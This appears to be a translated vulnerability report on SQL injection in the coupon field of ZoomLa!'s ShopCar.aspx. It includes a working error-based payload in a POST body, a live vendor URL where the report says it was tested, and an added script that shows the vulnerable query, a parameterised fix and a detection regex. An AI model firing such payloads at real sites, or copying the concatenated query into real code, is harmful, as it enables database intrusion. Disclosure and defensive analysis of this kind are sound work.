### Brief description:
As the title states.
### Details:
[![QQ图片20140511164417.jpg](https://images.seebug.org/upload/201405/11164349a794c0f8ca56a0da962591314c69c598.jpg)](https://images.seebug.org/upload/201405/11164349a794c0f8ca56a0da962591314c69c598.jpg)
The ShopCar.aspx file was obtained from the backup RAR offered for download on the official site. Its yhqtext parameter is not filtered properly, which leads to SQL injection.
POST request body:
```
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTkzMDY3NjYwOGRk6%2FTSo2pywhEJXAcamziGHTiH1Mo%3D&yhqtext=1%27and%2B1%3D%28select%2B%40%40version%29--&yhqpwd=1&Button1=%E5%8E%BB%E6%94%B6%E9%93%B6%E5%8F%B0%E7%BB%93%E5%B8%90&project=&jifen=&ProClass=&projuct=&Stock=&GuestName=&comedate=&GuestMobile=&cityname=&preID=&Type=
```
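The following is an added example, not code from the original report or from the Zoomla! product. It decodes the POST body above the way an ASP.NET form handler would, reconstructs the kind of string-concatenated query that makes yhqtext injectable (the `Coupon` table and its columns are assumed names, not taken from ShopCar.aspx), and shows the part of the statement that actually reaches the database once the `--` comment is honoured. The payload compares the integer 1 with the string returned by `@@version`; on SQL Server that comparison fails with a conversion error that echoes the version string, which is the error-based technique the report relies on.

```python
"""Decode the reported POST body and show why yhqtext is injectable.

Added example for this report; the query shape and table/column names are
assumptions for illustration, not the real code behind ShopCar.aspx.
"""
import re
from urllib.parse import parse_qs

# Constructed copy of the request body from the report, trimmed to the
# fields that matter (__VIEWSTATE and the empty cart fields are omitted).
POST_BODY = (
    "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS="
    "&yhqtext=1%27and%2B1%3D%28select%2B%40%40version%29--"
    "&yhqpwd=1"
    "&Button1=%E5%8E%BB%E6%94%B6%E9%93%B6%E5%8F%B0%E7%BB%93%E5%B8%90"
)


def form_field(body: str, name: str) -> str:
    """Return a form field URL-decoded as the server-side handler sees it.

    Note that %2B decodes to a literal '+', not to a space, so the payload
    keeps its '+' characters after decoding.
    """
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


def vulnerable_query(yhqtext: str, yhqpwd: str) -> str:
    """Hypothetical concatenated query of the kind that reproduces the bug.

    The coupon code and password are pasted straight into the SQL text, so a
    single quote in yhqtext ends the literal and the rest is parsed as SQL.
    """
    return ("SELECT * FROM Coupon WHERE Code='" + yhqtext
            + "' AND Pwd='" + yhqpwd + "'")


def effective_sql(query: str) -> str:
    """Drop everything after a T-SQL line comment so the executed part is visible."""
    idx = query.find("--")
    return query if idx < 0 else query[:idx]


def safe_query(yhqtext: str, yhqpwd: str):
    """Parameterised form: the SQL text is fixed and the values travel as data.

    Returned as (sql, params) the way one would hand it to SqlCommand parameters
    or to a DB-API cursor; the payload stays an ordinary string inside Code.
    """
    sql = "SELECT * FROM Coupon WHERE Code=@code AND Pwd=@pwd"
    return sql, {"@code": yhqtext, "@pwd": yhqpwd}


# A quote that closes the literal, optionally padded with whitespace or '+',
# followed by SQL syntax. Deliberately simple; it is a triage rule for log
# review, not a replacement for parameterised queries.
_INJECT_RE = re.compile(r"'[\s+]*(and|or|select|union|--)", re.IGNORECASE)


def looks_injected(value: str) -> bool:
    """Flag a coupon-code value that carries SQL syntax behind a quote."""
    return _INJECT_RE.search(value) is not None


if __name__ == "__main__":
    code = form_field(POST_BODY, "yhqtext")
    pwd = form_field(POST_BODY, "yhqpwd")
    print("decoded yhqtext :", code)
    print("concatenated SQL:", vulnerable_query(code, pwd))
    print("executed part   :", effective_sql(vulnerable_query(code, pwd)))
    print("parameterised   :", safe_query(code, pwd))
    print("flagged         :", looks_injected(code))
```

Running the script prints the decoded parameter `1'and+1=(select+@@version)--` and the executed fragment `... WHERE Code='1'and+1=(select+@@version)`, which is the comparison that makes SQL Server raise the conversion error.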
### Proof of vulnerability:
Tested on one of the vendor's subsidiary sites. URL: http://sc.zoomla.cn/ShopCar.aspx
[![QQ图片20140511164604.jpg](https://images.seebug.org/upload/201405/11164530688d18c7d0f8e9091d1918ed51c1f58a.jpg)](https://images.seebug.org/upload/201405/11164530688d18c7d0f8e9091d1918ed51c1f58a.jpg)
A very obvious error message. There is an anti-injection filter, but it is easily bypassed.